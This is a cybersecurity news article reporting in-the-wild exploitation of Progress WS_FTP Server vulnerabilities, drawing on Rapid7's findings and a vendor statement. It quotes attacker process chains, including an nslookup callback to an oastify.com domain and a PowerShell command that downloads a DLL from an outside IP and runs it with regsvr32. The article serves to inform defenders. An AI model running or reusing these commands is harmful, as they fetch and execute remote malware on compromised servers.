Tuesday, December 3, 2024
HomeCyber Security NewsExploitation of Critical WS_FTP Server Flaw Spotted in the Wild

Exploitation of Critical WS_FTP Server Flaw Spotted in the Wild

Published on

SIEM as a Service

As previously reported, Progress-owned WS_FTP was discovered with multiple vulnerabilities associated with cross-site scripting (XSS), SQL injection, cross-site request forgery, unauthenticated user enumeration, and a few others.

Progress has warned their users about the WS_FTP vulnerabilities and released a security advisory mentioning the fixed version of the WS_FTP server. Additionally, they have also requested their users to upgrade to the latest version.

Vulnerabilities Exploited in the Wild

According to the reports shared with Cyber Security News, these vulnerabilities were discovered to be exploited by threat actors in the wild. On investigating further, the exploit chain of execution was found to be the same across all the observed instances.

- Advertisement - SIEM as a Service
Document
FREE Demo

Deploy Advanced AI-Powered Email Security Solution

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

It was also mentioned that this could mean that there has been a mass exploitation of the vulnerable WS_FTP servers. The collected logs also consisted of one particular burp suite domain on all the recorded incidents which means that a single threat actor is doing the mass exploitation.

However, all the execution chain of commands has been listed below.

Great-grandparent Process:

C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipm18823d36-4194-409a-805b-cea0f4389a0c -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Grandparent Process:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe” /noconfig /fullpaths @”C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\aht\e514712b\a2ab2de1\ryvjavth.cmdline

Parent Process:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\Windows\TEMP\RES6C8F.tmp” “c:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\aht\e514712b\a2ab2de1\CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP

Child Process:

C:\Windows\System32\cmd.exe” /c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com

As per the reports, the Attack chain had the below command executions.

Great-grandparent Process:

C:\WINDOWS\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipme6a8a618-bb7f-470c-92e9-58204f6ffcfa -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Grandparent Process:

C:\Windows\System32\cmd.exe” /c powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Parent Process:

powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Child Process:

C:\Windows\System32\cmd.exe” /c regsvr32 c:\users\public\NTUSER.dll

Furthermore, a complete report has been published by Rapid7, which provides detailed information about the recorded incidents, mitigations, and other information.

“We have responsibly disclosed these vulnerabilities in conjunction with the researchers at Assetnote and have released a fix for each. Currently, we have not seen any indication that these vulnerabilities were exploited before we released the patch. Progress encourages our customers to upgrade to our software’s patched version as soon as possible. Security is of the utmost importance to us, and leveraging development best-practices to minimize product vulnerabilities is an integral part of our security program,” Statement from Progress Spokesperson.

Protect yourself from vulnerabilities using Patch Manager Plus to quickly patch over 850 third-party applications. Take advantage of the free trial to ensure 100% security.

Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

PEFT-As-An-Attack, Jailbreaking Language Models For Malicious Prompts

Federated Parameter-Efficient Fine-Tuning (FedPEFT) is a technique that combines parameter-efficient fine-tuning (PEFT) with federated...

Hackers Cloning Websites, Exploiting RCE Flaws To Gain Access To Shopping Platforms

Cybercriminals are leveraging AI-powered phishing attacks, website cloning tools, and RCE exploits to target...

Hackers Exploited Windows Event Logs Tool log Manipulation, And Data Exfiltration

wevtutil.exe, a Windows Event Log management tool, can be abused for LOLBAS attacks. By...

Threat Actors Allegedly Claims Breach of EazyDiner Reservation Platform

Reports have emerged of a potential data breach involving EazyDiner, a leading restaurant reservation...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

PEFT-As-An-Attack, Jailbreaking Language Models For Malicious Prompts

Federated Parameter-Efficient Fine-Tuning (FedPEFT) is a technique that combines parameter-efficient fine-tuning (PEFT) with federated...

Hackers Cloning Websites, Exploiting RCE Flaws To Gain Access To Shopping Platforms

Cybercriminals are leveraging AI-powered phishing attacks, website cloning tools, and RCE exploits to target...

Hackers Exploited Windows Event Logs Tool log Manipulation, And Data Exfiltration

wevtutil.exe, a Windows Event Log management tool, can be abused for LOLBAS attacks. By...